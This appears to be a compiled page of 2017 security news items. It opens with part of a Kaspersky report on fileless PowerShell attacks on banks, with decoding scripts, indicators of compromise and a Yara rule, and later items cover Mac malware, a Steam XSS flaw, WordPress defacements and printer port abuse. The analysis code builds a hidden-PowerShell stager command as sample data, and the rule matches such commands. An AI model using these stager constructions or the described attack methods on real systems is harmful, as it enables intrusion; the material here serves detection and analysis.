cat mal_powershell.ps1_4 | cut -f12 -d" " | base64 -di | cut -f8 -d\' | base64 -di | zcat - | cut -f2 -d\( | cut -f2 -d\" | less | grep \/ | base64 -di | hd
Resulting in the following payload:

 

Part of a code responsible for downloading Meterpreter from “adobeupdates.sytes[.]net”
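The decoding chain above, reimplemented in Python as an added example (this is not Kaspersky's code): the value stored in the service's binpath is base64 of UTF-16LE script text (the `-e` argument), the FromBase64String literal inside that text holds a gzip-compressed second stage, and the second stage's own FromBase64String literal holds the final blob that `hd` displays. The sample value is constructed inside the block with a benign placeholder where the real Meterpreter stage would be, and the PowerShell text around the literals is a minimal stand-in rather than a real stager; the layout is chosen so that the encoded argument is field 12 of the value, matching the `cut -f12` step.

```python
"""Peel the layers of an encoded PowerShell stager stored in a service binpath.

Added example, not Kaspersky's code. The sample is CONSTRUCTED here; the blob
it carries is a benign placeholder, not a captured payload.
"""
import base64
import gzip
import re

# Constructed stand-in for the bytes the real stager would decode into memory.
PLACEHOLDER_BLOB = b"CONSTRUCTED PLACEHOLDER, NOT A REAL PAYLOAD"

# A base64 literal passed to [Convert]::FromBase64String('...').
B64_LITERAL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
# The -e <base64> argument of powershell.exe.
ENCODED_ARG = re.compile(r"-e\s+([A-Za-z0-9+/=]+)")


def build_constructed_sample() -> str:
    """Build a binpath value with the same three-layer nesting as the attack."""
    blob_b64 = base64.b64encode(PLACEHOLDER_BLOB).decode()
    # Innermost layer: a script holding the final blob as a base64 literal.
    stage2 = f"[Byte[]]$var_code = [System.Convert]::FromBase64String('{blob_b64}')\n"
    # Middle layer: the inner script, gzip-compressed and base64-encoded.
    gz_b64 = base64.b64encode(gzip.compress(stage2.encode("utf-8"))).decode()
    stage1 = (f"$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('{gz_b64}'));"
              "# constructed stand-in: the real stage gunzips and invokes $s here")
    # Outer layer: powershell.exe -e takes base64 of the UTF-16LE script text.
    encoded = base64.b64encode(stage1.encode("utf-16-le")).decode()
    return ("C:\\Windows\\system32\\cmd.exe /b /c start /b /min "
            "powershell.exe -nop -w hidden -e " + encoded)


def decode_encoded_command(b64: str) -> str:
    """Layer 1: undo -e (base64 of UTF-16LE), like `cut -f12 | base64 -di`."""
    return base64.b64decode(b64).decode("utf-16-le")


def decode_gzip_layer(b64: str) -> str:
    """Layer 2: inner base64 plus gzip, like `cut -f8 -d\\' | base64 -di | zcat`."""
    return gzip.decompress(base64.b64decode(b64)).decode("utf-8")


def peel_stager(binpath: str) -> dict:
    """Return every decoded layer of a binpath/ImagePath value."""
    m = ENCODED_ARG.search(binpath)
    if not m:
        raise ValueError("no -e <base64> argument found")
    stage1 = decode_encoded_command(m.group(1))
    inner = B64_LITERAL.findall(stage1)
    if not inner:
        raise ValueError("stage 1 carries no FromBase64String literal")
    stage2 = decode_gzip_layer(inner[0])
    blob_b64 = B64_LITERAL.findall(stage2)
    if not blob_b64:
        raise ValueError("stage 2 carries no FromBase64String literal")
    return {"stage1": stage1, "stage2": stage2, "blob": base64.b64decode(blob_b64[0])}


def hexdump(data: bytes, width: int = 16) -> str:
    """Small stand-in for `hd` so the final blob can be eyeballed."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join("%02x" % b for b in chunk)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append("%08x  %-*s  |%s|" % (off, width * 3 - 1, hexpart, asc))
    return "\n".join(lines)


if __name__ == "__main__":
    layers = peel_stager(build_constructed_sample())
    print("stage 1:", layers["stage1"][:72], "...")
    print("stage 2:", layers["stage2"].strip())
    print(hexdump(layers["blob"]))
```

On a real case the input to peel_stager is the ImagePath string exported from the service key named in Appendix I; each ValueError names the layer at which a sample deviates from this nesting, which is itself useful triage information.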

Victims

Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table below shows the number of infections per country.
 

However we cannot confirm that all of them were infected by the same attacker.

Attribution

During our analysis of the affected bank we learned that the attackers had used several third-level domains and domains in the .GA, .ML and .CF ccTLDs. The trick of using such domains is that they are free and lack WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, attribution is almost impossible. The closest groups with the same TTPs are GCMAN and Carbanak.

Conclusions

Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately the use of common tools combined with different tricks makes detection very hard.

In fact, detection of this attack would be possible in RAM, network and registry only. Please check the Appendix I – Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.

After successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for successful exfiltration from a network, and how standard and open source utilities make attribution almost impossible.

Further details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017.

More information about this attack is available to customers of Kaspersky APT Intelligence Services. For a subscription inquiry, contact: intelreports (at) kaspersky [dot] com.

Appendix I – Indicators of Compromise

To find the host used by an attacker using the technique described for remote connections and password collection, the following paths in the Windows registry should be analyzed:

HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the SC utility
HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the NETSH utility
In unallocated space in the Windows registry, the following artefacts might be found:

powershell.exe -nop -w hidden -e
10.10.1.12/8080
10.10.1.11/4444
Please note that these IPs are taken from the IR case in which we participated, so an actual attacker could use any other IPs. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.

Verdicts:

MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg.c
HEUR:Trojan.Multi.Powecod
Appendix II – Yara Rules


rule msf_or_tunnel_in_registry
{
    strings:
        $port_number_in_registry = "/4444"
        $hidden_powershell_in_registry = "powershell.exe -nop -w hidden" wide
    condition:
        uint32(0)==0x66676572 and any of them
}
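To make the rule's clauses explicit, here is an added Python re-statement of its semantics (not part of the Kaspersky report, and not a Yara replacement): uint32(0)==0x66676572 is the little-endian reading of the hive signature bytes "regf"; the port string is matched as plain ASCII because a value name made only of ASCII characters, such as 0.0.0.0/4444, is stored with single-byte characters in the hive; and the PowerShell string carries `wide` because REG_SZ/REG_EXPAND_SZ data such as a service ImagePath is stored as UTF-16LE. The hive buffers are constructed (a real hive has cell structures between the header and the value data); the fourth sample shows that an ASCII-only copy of the PowerShell string is not matched by a `wide` string.

```python
"""Python re-statement of the msf_or_tunnel_in_registry Yara rule's semantics.

Added example, not part of the report. The hive buffers below are CONSTRUCTED.
"""
import struct

# uint32(0)==0x66676572 in the rule is the little-endian reading of b"regf".
REGF_MAGIC = 0x66676572
assert struct.unpack("<I", b"regf")[0] == REGF_MAGIC

# $port_number_in_registry (no modifier): matched as ASCII. All-ASCII value
# names such as 0.0.0.0/4444 are stored with single-byte characters in a hive.
PORT_NUMBER_IN_REGISTRY = b"/4444"

# $hidden_powershell_in_registry ... wide: REG_SZ/REG_EXPAND_SZ data such as a
# service ImagePath is stored as UTF-16LE, so the rule matches the wide form.
HIDDEN_POWERSHELL_IN_REGISTRY = "powershell.exe -nop -w hidden".encode("utf-16-le")


def is_regf(buf: bytes) -> bool:
    """uint32(0)==0x66676572: the buffer starts with a registry hive header."""
    return len(buf) >= 4 and struct.unpack_from("<I", buf, 0)[0] == REGF_MAGIC


def which_strings_match(buf: bytes) -> list:
    """Name the rule strings present in the buffer, for triage output."""
    hits = []
    if PORT_NUMBER_IN_REGISTRY in buf:
        hits.append("$port_number_in_registry")
    if HIDDEN_POWERSHELL_IN_REGISTRY in buf:
        hits.append("$hidden_powershell_in_registry")
    return hits


def matches_msf_or_tunnel_in_registry(buf: bytes) -> bool:
    """condition: uint32(0)==0x66676572 and any of them"""
    return is_regf(buf) and bool(which_strings_match(buf))


def _hive(*cells: bytes) -> bytes:
    """Constructed hive-like buffer: the signature, padding, then raw cells."""
    return b"regf" + b"\x00" * 28 + b"".join(cells)


# Service key with a hidden PowerShell ImagePath (UTF-16LE data): matches.
SAMPLE_SERVICE_HIVE = _hive(
    b"ImagePath\x00",
    "cmd.exe /c powershell.exe -nop -w hidden -e AAAA".encode("utf-16-le"))
# portproxy v4tov4\tcp value named 0.0.0.0/4444 (ASCII name): matches.
SAMPLE_PORTPROXY_HIVE = _hive(
    b"v4tov4\x00tcp\x00", b"0.0.0.0/4444", "10.10.1.12/8080".encode("utf-16-le"))
# Same content but not a hive: the magic check rejects it.
SAMPLE_NOT_A_HIVE = b"MZ" + SAMPLE_SERVICE_HIVE[2:]
# ASCII-only copy of the PowerShell string: the wide string does not match it.
SAMPLE_ASCII_ONLY = _hive(b"powershell.exe -nop -w hidden -e AAAA")


if __name__ == "__main__":
    for name, buf in [("service", SAMPLE_SERVICE_HIVE), ("portproxy", SAMPLE_PORTPROXY_HIVE),
                      ("not-a-hive", SAMPLE_NOT_A_HIVE), ("ascii-only", SAMPLE_ASCII_ONLY)]:
        print(name, matches_msf_or_tunnel_in_registry(buf), which_strings_match(buf))
```

The same functions can be pointed at an exported SYSTEM hive file (read as bytes) to reproduce what the rule would report; the ascii-only sample is the reminder that string modifiers in a hive rule have to follow how the registry actually stores names and data.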


Iranian Hackers Use Mac Malware to Steal Data

8.2.2017 securityweek Virus


A cyber espionage group linked to Iran has been using an unsophisticated piece of malware named MacDownloader to steal credentials and other data from Mac computers.

The malware was analyzed by Claudio Guarnieri and Collin Anderson, researchers specializing in Iranian surveillance and espionage campaigns targeting human rights, foreign policy and civil society entities.

MacDownloader, disguised by attackers as a Flash Player update and a Bitdefender adware removal tool, was created towards the end of 2016. Much of the code has been copied from other sources and experts believe this could be an amateur developer’s first attempt at creating a piece of malware.

When Guarnieri and Anderson conducted their analysis, the malware had not been known to any of the security products on VirusTotal. At the time of writing, nearly a dozen vendors have flagged the fake Flash Player and Bitdefender apps as malicious.

MacDownloader was first spotted on a fake website of aerospace firm United Technologies Corporation, which had previously delivered Windows malware. The same host had also been used to deploy the Browser Exploitation Framework (BeEF) on sites apparently belonging to the U.S. Air Force and a dental office.

While the attacks observed by Guarnieri and Anderson appear to be targeted at the defense industrial base sector, the experts are aware of reports that it has also been used against a human rights advocate.

Evidence suggests that the macOS malware is tied to Charming Kitten, aka Newscaster and NewsBeef, an Iranian threat actor known for creating fake personas on social networking websites in an effort to harvest information from targeted individuals in the US, Israel, the UK, Saudi Arabia and Iraq. Charming Kitten is also known for using BeEF.

Once it infects a device, the malware harvests information about the system, including processes and applications, and collects passwords stored in the Keychain. The Windows malware used by the group is similar, collecting saved credentials and browser history from Chrome and Firefox.

While its code shows that the developers of MacDownloader have attempted to implement remote update and persistence capabilities, these mechanisms don’t appear to be functional.

Researchers have found links between MacDownloader and other threat actors believed to be located in Iran, including the Iran Cyber Security Group, which specializes in defacing websites, and Flying Kitten (aka Rocket Kitten), which is known for targeting organizations in the Middle East and NATO countries.


Valve is going to fix a serious vulnerability in Steam online gaming platform
8.2.2017 securityweek Vulnerability

The online game platform Steam is fixing a serious bug that could be exploited to redirect users to malicious websites and take over their profile.
The popular online game platform Steam is going to fix a serious vulnerability that could be exploited by hackers to redirect users to malicious websites, use their market funds, and also change their profile.

It seems that the XSS flaw on Steam profiles has been only partially fixed: the fix appears to cover only the initial activity feed pages, while the flaw is still present on subsequent pages.

The attackers can exploit the flaw by inserting JavaScript and other malicious code into their profiles; the code is then executed without any warning on the computers of anyone who visits the booby-trapped page.

The vulnerability was first reported in a Reddit thread this week, and experts observed that in a few hours after its disclosure many people were creating profiles that contained the code to trigger the vulnerability.

According to Ars, most of the exploit pages just redirect visitors to a site with PHP code that prompts them to download an unknown file.

“Such redirections, however, are possibly only a small sample of what the underlying exploit makes possible. One Reddit participant said here and here that viewing malicious profiles could force people to make purchases using their Steam market funds.” Ars reported.

Clearly, the flaw in the Steam platform could also be exploited to steal the visitors’ authentication cookies and take control of their user accounts.

The number of infected profiles is expected to grow rapidly, because it is enough for users to visit an existing malicious profile.


The Steam platform has already been exploited by hackers in the past to launch cyber attacks. In October 2016, the malware researcher Lawrence Abrams found a Reddit user warning of hacked Steam accounts being used to spread a Remote Access Trojan (RAT).

In March 2016, Kaspersky Lab security expert Santiago Pontiroli and independent security researcher Bart P published an interesting analysis of malware targeting the Steam gaming platform and of the evolution of these threats over the last few years.

Valve estimated that nearly 77,000 accounts are hijacked and pillaged each month.

Back to the present: Steam users who think they may have visited a malicious profile are urged to check their settings and should change their passwords. I always suggest also enabling two-factor authentication to avoid ugly surprises.


Thousands of WordPress Sites Hacked Using Recently Disclosed Vulnerability
8.2.2017 thehackernews Hacking
Last week, we reported on a critical zero-day flaw in WordPress that was silently patched by the company before hackers could get their hands on the nasty bug and exploit millions of WordPress websites.
To ensure the security of millions of websites and their users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public.
But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which remain vulnerable to the critical bug that has already been exploited by hackers.
While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature in order to test patches first and apply them afterwards.
Even the news blog of the well-known Linux distribution openSUSE (news.opensuse.org) was hacked, but it was restored immediately without any other part of openSUSE's infrastructure being breached, CIO reports.
The vulnerability resided in the WordPress REST API and could lead to further flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites, redirect their visitors to malicious exploits, and carry out a large number of other attacks.

The security researchers at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still-unpatched websites.
In one such campaign, hackers succeeded in replacing the content of over 66,000 web pages with "Hacked by" messages. The remaining campaigns have targeted roughly 1000 pages in total.
Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaigns, in order to spread spam and gain ranking in search engines, which is also known as search engine poisoning.
"What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri.
"There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability."
So, site administrators who have not yet updated their websites to the latest WordPress release, 4.7.2, are urged to patch them immediately before becoming the next target of SEO spammers and hackers.


U.S. Could Ask Visa Applicants for Social Media Passwords

8.2.2017 securityweek Social
US embassies could ask visa applicants for passwords to their own social media accounts in future background checks, Homeland Security Secretary John Kelly said Tuesday.

Kelly said the move could come as part of the effort to toughen vetting of visitors to screen out people who could pose a security threat.

He said it was one of the things under consideration especially for visitors from seven Muslim majority countries with very weak background screening of their own -- Iran, Iraq, Libya, Somalia, Sudan, Syria and Yemen.

"We're looking at some enhanced or some additional screening," Kelly told a hearing of the House Homeland Security Committee. "We may want to get on their social media, with passwords," he said.

"It's very hard to truly vet these people in these countries, the seven countries... But if they come in, we want to say, what websites do they visit, and give us your passwords. So we can see what they do on the internet."

"If they don't want to cooperate, then they don't come in" to the United States, he said.

Kelly stressed that no decision had been made on this, but said tighter screening was definitely in the future, even if it means longer delays for awarding US visas to visitors.

"These are the things we are thinking about," he said.

"But over there we can ask them for this kind of information and if they truly want to come to America, then they will cooperate. If not, next in line."

The seven countries were targeted in President Donald Trump's January 27 immigrant and refugee ban order, which has since been at least temporarily blocked under court order.


Google Challenges Search Warrant Ruling

8.2.2017 securityweek Security
Google is planning to appeal a ruling made Friday that it must comply with search warrants involving customer data stored on servers outside of the United States. The case is similar to an earlier case involving Microsoft. In July 2016, the 2nd U.S. Circuit Court of Appeals in New York said Microsoft could not be forced to turn over emails stored on a server outside of the US. Now, however, Magistrate Judge Thomas Rueter in Philadelphia has taken the opposite view with Google.

Both cases involve search warrants issued under the 1986 Stored Communications Act (SCA). Microsoft was also initially ordered to comply. It appealed, and eventually Judge Susan Carney of the appeals court said that the SCA does not give US courts authority to force internet companies in the United States to seize customer email contents stored on foreign servers. At the time, Microsoft chief legal officer Brad Smith said, "It makes clear that the US Congress did not give the US Government the authority to use search warrants unilaterally to reach beyond US borders."

Google expected this precedent to be upheld in its own refusal to comply with a similar search warrant. The government's key argument is that no search is undertaken on foreign soil -- the data is lawfully brought back to the US, and the search is lawfully conducted within the US. For Microsoft, this argument was rejected; but for Google it has been accepted.

"Though the retrieval of the electronic data by Google from its multiple data centers abroad has the potential for an invasion of privacy, the actual infringement of privacy occurs at the time of disclosure in the United States," Rueter wrote.

Google has said it will appeal the ruling. "The magistrate in this case departed from precedent, and we plan to appeal the decision. We will continue to push back on overbroad warrants," it said in a statement.

If the appeal process fails, the case could have serious implications for US/EU business relations. EU data protection laws prevent the export of European personal information to any country that does not have adequate (that is, equivalent) data protection laws. That exclusion would include the US were it not for the special agreement known as Privacy Shield. It is the Privacy Shield that allows US tech giants such as Google and Facebook to operate in Europe; but it also allows any US commercial business to trade with the European Union.

Many commentators believe that Privacy Shield will fail European constitutional examination. It currently exists largely because of the political will on both sides to make it exist; but that will is already being eroded by new President Trump's apparent isolationism and support for US law enforcement.

Speaking to SecurityWeek about the effect that President Trump's executive order titled 'Enhancing Public Safety in the Interior of the United States' might have on Privacy Shield, David Flint (a senior partner at the MacRoberts law firm) commented, "It is unclear at this stage..." But he also added, "The more concerning issue for Privacy Shield is that there is a possible carve out for national security and similar issues and it remains unclear as to the extent that the new Administration will seek to define all foreigners' PII as 'a security issue'."

Privacy Shield, he explained, "is a complex interconnected matrix of law, policy and 'comfort letters'; absent any of these three legs, it is likely that some national data protection authorities may consider that there is no longer confidence in the implementation of that matrix (of which many were skeptical) and declare the US as having inadequate protection - now, and certainly after GDPR implementation."

Poland-based privacy consultant Alexander Hanff was more forthright. "Trump's Executive Order has accelerated the demise of a transatlantic lie - a lie which would have been exposed eventually by the CJEU [the Court of Justice, Europe's ultimate constitutional court] anyway; a lie which circumvents the constitutional rights of EU Citizens."

With such concern over an executive order that does not directly deal with European PII, it is difficult to see how US government access to European data directly from US companies -- especially when the data may be physically stored in Europe -- can withstand a legal challenge to the European courts. It is fair to say that in the current climate, if Google is forced to hand over foreign data on the basis of a search warrant, it could prove the end of Privacy Shield. Search warrants and the FBI could be as toxic to Privacy Shield as Prism and the NSA were to its predecessor Safe Harbor.


LOGmanager can now cooperate with other log management systems

8.2.2017 SecurityWorld Software
Sirwisa has released a new version of LOGmanager, a Czech tool for log management and analysis.

Improvements in the new version include, for example, the ability to forward records to upstream SIEM systems from other vendors, where the logs can be subjected to advanced analysis or correlated with information from other sources.

What is new in LOGmanager version 2.2.0, according to the vendor:

support for forwarding events to an upstream syslog server
support for receiving and parsing events in LEEF format
a button for testing the connection to the update server (System > Software)
improved web server configuration (only TLSv1.2 is allowed for connection encryption; HSTS security headers added)
updated dashboards (larger input field for field names, improvements to the display of Windows file activity, alert display, postfix/sendmail and Windows Logons)
the mouse-wheel zoom function in Blockly has been disabled

The essence of LOGmanager is the collection of all of an organization's relevant events and logs, their storage in a central secured repository with a predefined retention period, and the ability to search enormous volumes of data in real time. Search results are presented in text and graphical form with a high degree of interactivity with respect to the data found.

The system also allows data to be stored long-term in a tamper-evident form for regulatory compliance, forensic analysis requirements and possible security audits. The solution also helps meet the requirements of the Czech Cyber Security Act.

The distributor of LOGmanager in the Czech Republic is Veracomp; implementation can also be carried out through a number of certified partners.


Cybercriminals took the Austrian parliament's website offline

7.2.2017 Novinky/Bezpečnost Kyber
On Sunday, computer pirates took the website of the Austrian parliament offline for roughly twenty minutes, but they did not get at any non-public data. The parliament said so in a statement, adding that no damage was done and that the security authorities are dealing with the case. Meanwhile, the Turkish Islamist group Lion Soldiers Team (ANT) claimed responsibility, the Reuters agency reported.
"The hacker attack was apparently carried out as a so-called DDoS attack; the websites of the foreign and defence ministries were the targets of a similar attack last December," the parliament specified in the statement.

A DDoS (Distributed Denial of Service) attack always follows the same scenario. Hundreds of thousands of computers start accessing a particular server at the same moment. The server usually cannot handle such a large number of requests and goes down. To ordinary users, the attacked website then appears unavailable.

ANT states on its website that it protects the homeland, Islam, the nation and the flag. Reuters noted that relations between Turkey and Austria cooled considerably last year after Austria called for a freeze on accession talks between the European Union and Ankara.

Vienna was reacting above all to the conduct of the Turkish authorities after last year's failed attempt to overthrow President Recep Tayyip Erdogan. ANT also announced on its website that it is carrying out operations against the pro-Kurdish Peoples' Democratic Party (HDP), the Austrian central bank and a certain Austrian airport.

The Czech Republic faced attacks too
In 2013 some domestic servers faced massive DDoS attacks. They were directed first at news websites, then at the Seznam.cz portal, and at the servers of banks and telephone operators.

According to security experts, it was the largest cyber attack in the entire history of the Czech Republic at the time.


"We must verify your account information!" Bad phishing this time targets Fio Bank customers
7.2.2017 Živě.cz Phishing
Another bank warning of phishing attacks on its clients is Fio Bank. Attackers are sending out the dangerous e-mails these days, and fortunately they are easy to recognize thanks to machine translation in broken Czech. Even so, that may not stop the least vigilant users from clicking on the link and entering their login details into the fraudulent form.

Even very bad Czech often does not deter users from clicking on the link and entering their details into the fraudulent form (photo: Fio Bank)

The e-mails may come, for example, from the address kontakt@fiobanka.prihlaste.cz. The site Přihlaste.cz actually does aggregate the internet banking sites of Czech banks, as well as the login pages of social networks.

In any case, do not click on the link in the received message; move the e-mail to spam or delete it outright. If you have entered your details into the fraudulent form, contact customer support immediately.


An attacker took control of 160,000 printers and is printing warnings about attacks on them
7.2.2017 Root.cz Hacking
"For the love of God, close that port," reads the ASCII-art flyers coming out of 160,000 printers around the world. A benevolent hacker is thus trying to draw attention to a security flaw in PostScript.
A group of experts from the University Alliance Ruhr discovered a "cross-site printing" (XSP) flaw in the old implementation of PostScript and PJL in laser printers. The flaw affects printers from well-known names such as Dell, Brother, Konica, Samsung, HP and Lexmark. A successful attacker can exploit it to obtain passwords, mine sensitive data from the print queue or take the device down.

An old flaw in PS and PJL
The problem is all the worse because the flaw is not new; it has been hidden in devices for decades. It lets an attacker browse the printer's file system, provided they can reach the printer and are allowed to print, which can be arranged over the network or via USB. The discoverers wrote a Python tool that allows the print queue to be manipulated remotely, files on the disk to be read, the printer's memory to be accessed, or the device to be physically destroyed.

In total, six different security holes were published, allowing buffer overflows, password theft and the capture of print jobs. One of the methods abuses Cross-Origin Resource Sharing (CORS) together with XSP to reach the printer's raw printing port, TCP 9100, from a web browser. The attacker lures the victim to a page with a hidden iframe, which then starts communicating from the user's computer with a printer hidden inside the network.

The request may contain commands in PostScript or PJL, as the wiki at hacking-printers.net describes. According to the authors it is also possible to send data from the printer back to the browser if the PostScript output is prepared correctly: the printer can, for example, emulate an HTTP server, shaping its output to look like an HTTP response with permissive CORS headers, so that the page's JavaScript is allowed to read it. The printer can then be fully controlled.

A benevolent attacker
Not long after the disclosure of this security flaw, 160,000 printers around the world started humming, from large office machines to receipt printers at checkouts. An unknown attacker using the handle Stackoverflowin took remote control of them all and began printing warning "leaflets" stating that the device is vulnerable and should be secured.

Stackoverflowin is in your printer
There are several versions of the image, and photographs of them are starting to appear on the internet. What they have in common is an ASCII-art picture (a robot or a computer) and a short explanatory text. A contact or a link to a Twitter account is included.

For the love of God, close this port!
The attacker claims to be under 18 and says his tool looks for publicly reachable printers with open RAW, IPP (Internet Printing Protocol) and LPR (Line Printer Remote) access on TCP ports 9100, 631 and 515, and then sends print jobs to them. What surprised him most, he says, was how easy the whole thing was: he scanned the internet with zmap and then ran a simple C program that sent out the jobs. He claims that you can push your own firmware to most printers the same way, and that it does not need to be signed.

The text looks, for example, like this:

stackoverflowin the hacker god has returned, your printer is part of
a flaming botnet, operating on putin's forehead utilising BTI's
(break the internet) complex infrastructure.
[ASCII ART HERE]
For the love of God, please close this port, skid.
-------
Questions?
Twitter: https://twitter.com/lmaostack
-------
Users are reporting messages coming out of many different printer models, for example Afico, Brother, Canon, Epson, HP, Lexmark, Konica Minolta, Oki and Samsung. Products of other manufacturers may be affected as well. According to the youngster, the warning was printed on 160,000 devices this way, but the number of attackable printers is more than 300,000.

For now it is "benevolent spam" meant to point out a potentially serious problem. Although the printed statements claim that the printers are part of a botnet, according to the attacker that is not true. The risk is real, though: if someone started abusing the printers on a massive scale, they could build a botnet similar to Mirai out of them and use it at will. Even though this demonstration is, in fact, also illegal, nobody has actually been harmed so far.

Do you run a network printer? Check which ports it exposes to the network, and above all whether any of them are reachable from the internet rather than only from your LAN.
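A defensive check for the point above (which ports a network printer exposes), added here as an example and not taken from the Root.cz article or from the researchers' tool. It probes the three ports the leaflet campaign scanned, TCP 9100, 631 and 515, and, where the raw port answers, sends a harmless PJL `INFO ID` query to identify the model (nothing is printed). The fake printer bound to loopback exists only so the example runs offline; point the functions at the printer's real address instead, and run the probe from outside your firewall as well: a port reachable from the LAN is expected, one reachable from the internet is what the leaflets are warning about.

```python
import socket
import threading
from typing import Dict, Optional

# The three printing services the leaflet campaign scanned for.
PRINTER_PORTS: Dict[int, str] = {9100: "RAW (JetDirect)", 631: "IPP", 515: "LPR"}

# PJL "universal exit language" sequence; it brackets the query so the printer parses it as PJL.
UEL = b"\x1b%-12345X"


def build_pjl_info_request() -> bytes:
    """A read-only PJL query asking the device to identify itself."""
    return UEL + b"@PJL INFO ID\r\n" + UEL


def parse_pjl_info_id(response: bytes) -> Optional[str]:
    """Pull the quoted model string out of an '@PJL INFO ID' reply.

    A typical reply is the echoed command, CRLF, the model name in double quotes,
    CRLF and a terminating form feed (0x0c).
    """
    for line in response.split(b"\r\n"):
        line = line.strip()
        if len(line) >= 2 and line.startswith(b'"') and line.endswith(b'"'):
            return line[1:-1].decode("latin-1")
    return None


def probe_port(host: str, port: int, timeout: float = 1.0) -> bool:
    """True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def exposed_printer_ports(host: str, ports: Dict[int, str] = PRINTER_PORTS,
                          timeout: float = 1.0) -> Dict[int, str]:
    """Subset of the printing ports that accept connections on host."""
    return {port: name for port, name in ports.items() if probe_port(host, port, timeout)}


def identify_raw_printer(host: str, port: int = 9100, timeout: float = 2.0) -> Optional[str]:
    """Send the PJL identification query over the raw port and parse the answer."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            sock.sendall(build_pjl_info_request())
            data = b""
            while b"\x0c" not in data and len(data) < 4096:  # reply ends with a form feed
                chunk = sock.recv(1024)
                if not chunk:
                    break
                data += chunk
    except OSError:
        return None
    return parse_pjl_info_id(data)


def start_fake_printer(reply: bytes = b'@PJL INFO ID\r\n"HP LaserJet 4250"\r\n\x0c') -> int:
    """Constructed stand-in for a printer's raw port on loopback, so the example runs offline.

    Returns the ephemeral port it listens on. A real check targets the printer's own address.
    """
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            with conn:
                try:
                    conn.recv(1024)  # the PJL request (or nothing, for a bare port probe)
                    conn.sendall(reply)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    fake = start_fake_printer()
    print("exposed printing ports:", exposed_printer_ports("127.0.0.1", {fake: "RAW (fake)"}))
    print("identified as:", identify_raw_printer("127.0.0.1", fake))
```

IPP (631) and LPR (515) are only probed for reachability here; the identification query is a raw-port (PJL) feature. If the raw port answers from the internet, the fix is a firewall rule or disabling the service on the device, not a firmware update alone.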


Palo Alto Networks Unveils Big Product Updates, New Firewalls

7.2.2017 securityweek Safety
Palo Alto Networks on Tuesday announced the launch of PAN-OS 8.0, which brings major improvements to the company’s Next-Generation Security Platform, and several new hardware and virtual firewall appliances.

According to the company, PAN-OS 8.0 introduces more than 70 new enhancements and capabilities, including for securing cloud deployments and SaaS applications, preventing the theft and abuse of credentials, simplifying security operations, and blocking threats.

The threat prevention features are designed to prevent sandbox evasion, block command and control (C&C) communications, automate intelligence integration, and improve threat detection and alerting mechanisms.

PAN-OS 8.0 is designed to address credential theft by automatically identifying and blocking phishing websites, preventing users from entering credentials on phishing sites, and providing a policy-based multi-factor authentication framework natively in the firewall to avert the use of stolen credentials.

As for cloud and SaaS, the latest version of the operating system brings optimized workflow automation features for cloud services, and improved visibility, reporting and automation for SaaS applications.

Palo Alto Networks also announced the release of new hardware and virtual firewall appliances that complement PAN-OS 8.0. In addition to the existing 16 hardware appliances, the company now offers six new devices designed to provide improved traffic visibility and control.

The new appliances are PA-5260, PA-5250 and PA-5220 of the PA-5200 series, PA-850 and PA-820 of the PA-800 series, and the PA-220. The PA-5200 series devices are ideal for data centers, the PA-800 series is designed for medium-size networks and branch offices, and the PA-220 is ideal for small branch offices and remote locations.

Some of the new VM-Series virtual firewalls offer performance of up to 16 Gbps and are ideal for service providers and data centers, while the lower-end models are designed for minimal resource consumption and are best suited for virtual branch offices.


Rocket AI and the next generation of AV software
7.2.2017 Kaspersky Security
The annual Conference on Neural Information Processing Systems (NIPS) was held in Barcelona on 5–10 December 2016. It is, most likely, one of the two most important conferences in the AI field; this year 5,680 AI experts attended (the other of these large conferences is ICML).

This is not the first year that Kaspersky Lab has taken part in the conference; it is essential for our experts to stay informed about the most up-to-date approaches to machine learning. This time there were five Kaspersky Lab employees at NIPS, each from a different department and each working on machine learning implementations that protect users from cyberthreats.

However, my intent is to tell you not about the benefits of attending the conference but about an amusing incident devised and put into action by AI luminaries.

Rocket AI is the Next Generation of Applied AI

This story was covered in detail by Medium, and I shall only briefly relate the essence of the matter.

Right as the conference was happening, the www.rocketai.org website was created with this bubble on its main page:

[screenshot: the rocketai.org main page]

Please note that this is not just AI, but the next generation of AI. The idea of the product was described on the site like this:

[screenshot: the Rocket AI product description]

